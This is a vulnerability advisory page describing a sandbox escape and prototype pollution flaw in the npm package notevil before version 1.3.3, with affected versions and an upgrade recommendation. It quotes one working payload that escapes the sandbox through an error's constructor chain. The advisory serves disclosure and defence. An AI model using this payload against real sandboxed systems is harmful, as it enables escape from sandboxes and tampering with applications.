Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlneHItcmh4Ni00amd2

Sandbox Breakout / Prototype Pollution in notevil

Versions of notevil prior to 1.3.3 are vulnerable to Sandbox Escape leading to Prototype pollution. The package fails to restrict access to the main context, allowing attacker to add or modify an object's prototype.

Evaluating the payload try{a[b];}catch(e){e.constructor.constructor('return __proto__.arguments.callee.__proto__.polluted=true')()} add the polluted property to Function.

Recommendation

Upgrade to version 1.3.3 or later.

Permalink: https://github.com/advisories/GHSA-9gxr-rhx6-4jgv
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTlneHItcmh4Ni00amd2
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: over 4 years ago
Updated: about 2 years ago

Identifiers: GHSA-9gxr-rhx6-4jgv
References:

Blast Radius: 0.0

Affected Packages

npm:notevil

Dependent packages: 32
Dependent repositories: 1,049
Downloads: 30,929 last month
Affected Version Ranges: < 1.3.3
Fixed in: 1.3.3
All affected versions: 0.0.0, 0.0.1, 0.0.2, 0.1.0, 0.2.0, 0.3.0, 0.4.0, 0.5.0, 0.6.0, 0.7.0, 0.8.0, 0.8.1, 1.0.0, 1.1.0, 1.2.0, 1.3.0, 1.3.1, 1.3.2
All unaffected versions: 1.3.3